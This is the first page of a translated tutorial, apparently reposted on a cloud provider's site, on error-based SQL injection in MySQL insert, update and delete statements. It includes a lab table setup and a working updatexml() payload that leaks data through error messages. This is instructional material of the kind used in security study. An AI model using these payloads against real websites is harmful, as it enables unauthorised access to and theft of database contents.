Use insert, update, and delete injection to obtain data _ MySQL

Source: Internet
Author: User
Getting data through insert, update, and delete injection 0x00

SQL injection can be used to obtain database data, which can be roughly divided into joint query, error reporting, Boolean blind injection, and delayed injection, these methods are generally implemented based on the SQL injection points in the select query statement. When we find an injection point based on insert, update, and delete statements (for example, some websites record user browsing records, including referer, client_ip, and user-agent, is there a function similar to user registration, password modification, information deletion, and so on), can we use the above method to obtain the data we need? Here, we take the MYSQL explicit error as an example to see how to obtain the desired data in the insert, update, and delete injection points.

0x01 environment setup

To better demonstrate the injection effect, we first use the following statement to create the original data:

create database newdb;use newdb; create table users(id int(3) not null auto_increment,username varchar(20) not null,password varchar(20) not null, primary key (id)); insert into users values(1,'Jane','Eyre');

Take a look at the current data structure:

0x02 injection syntax

Because the explicit error mode is used here, the idea is to use the following statement in the insert, update, and delete statements to create a syntax error:

insert into users (id, username, password) values (2,''inject here'','Olivia'); insert into users (id, username, password) values (2,""inject here"",'Olivia');

Note: We can see that the username field is to be filled in. we have entered the 'inject here 'and "inject here" fields to achieve an error, one is single quotation marks and the other is double quotation marks. it must be flexibly constructed according to the actual injection points.

0x03 use updatexml () to obtain data

The updatexml () function is an XPATH function for MYSQL to query and modify XML document data.

Payload:

or updatexml(1,concat(0x7e,(version())),0) or

Insert:

INSERT INTO users (id, username, password) VALUES (2,'Olivia' or updatexml(1,concat(0x7e,(version())),0) or'', 'Nervo');

[1] [2] [3] [4] [5] [6] Next page

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.